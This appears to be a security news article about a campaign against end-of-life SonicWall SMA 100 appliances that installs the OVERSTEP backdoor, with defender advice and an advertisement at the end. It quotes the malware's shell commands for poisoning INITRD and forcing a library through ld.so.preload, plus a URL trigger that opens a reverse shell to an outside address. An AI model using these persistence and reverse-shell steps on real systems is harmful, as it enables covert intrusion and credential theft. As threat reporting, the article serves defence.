SonicWall SMA Devices 0-Day RCE Vulnerability Exploited to Deploy OVERSTEP Ransomware

SonicWall’s end-of-life SMA 100 series appliances are again on the front line after investigators unearthed a covert campaign that couples a suspected zero-day remote-code-execution flaw with a sophisticated backdoor called OVERSTEP.

The operation, attributed to the financially motivated group UNC6148, first steals administrator credentials and one-time-password seeds, then pivots to full device compromise before exfiltrating data and preparing for ransomware deployment.

The attack chain begins with a burst of HTTP requests that ultimately hands the adversary a shell on the appliance—an action that should be impossible under normal conditions.

Google Threat Intelligence analysts noted that once the shell is active the intruder exports the device’s configuration, quietly injects malicious rules, and uploads a base64-encoded binary into the persistent /cf partition.

The binary is later copied to /usr/lib/libsamba-errors.so.6 and force-loaded on every process start via /etc/ld.so.preload, instantly granting the actor root-level reach across the appliance.

Investigators tied the initial foothold to one of several long-standing SMA vulnerabilities routinely traded in crime forums.

Table 1 summarises the most relevant bugs that provide either direct code-execution or credential theft paths exploited by related campaigns over the past three years.

The Shell commands executed by the dopasswords command depicts how OVERSTEP compresses credential databases into a web-reachable TAR archive, ensuring effortless download by the attacker.

Persistence Tactics: Hijacking the Boot Sequence

Once foothold is secured, UNC6148 cements persistence by rewriting the bootCurrentFirmware() routine inside /etc/rc.d/rc.fwboot.

The modified script mounts the device’s compressed initial RAM disk (INITRD), plants the trojanised library, and rewrites INITRD.GZ so the rogue code loads before any legitimate service.

A timestamp “touch” operation aligns file dates with the official kernel image, frustrating any quick metadata checks.

# Extract and poison INITRD
gzip -d $fwLoc/INITRD.GZ
mount -o loop $fwLoc/INITRD $fwLoc/zzz
cp /cf/libsamba-errors.so.6 $fwLoc/zzz/usr/lib/
echo /usr/lib/libsamba-errors.so.6 > $fwLoc/zzz/etc/ld.so.preload
umount $fwLoc/zzz && gzip $fwLoc/INITRD
mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ
/usr/local/sbin/kexec -l $fwLoc/BZIMAGE --append="`cat $fwLoc/LINUX.OPT`"
/usr/local/sbin/kexec -e

When the appliance reboots, every dynamic binary—including the web server responsible for logging—links against the malicious library.

OVERSTEP hooks open*, readdir*, and write to hide its presence and parse inbound buffers for the strings dobackshell or dopasswords.

A single HTTP GET such as https://device/query?q=dobackshell,1.2.3.4,4444 triggers a reverse shell without touching disk logs, thanks to in-memory log tampering executed inside the hijacked write call.

The result is a resilient foothold: even fully patched appliances can be re-compromised as long as stolen credentials remain valid.

Google’s analysts urge defenders to image disks offline, rotate every password and OTP seed, and verify the absence of /etc/ld.so.preload; its very existence on SMA hardware is “tantamount to compromise”.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now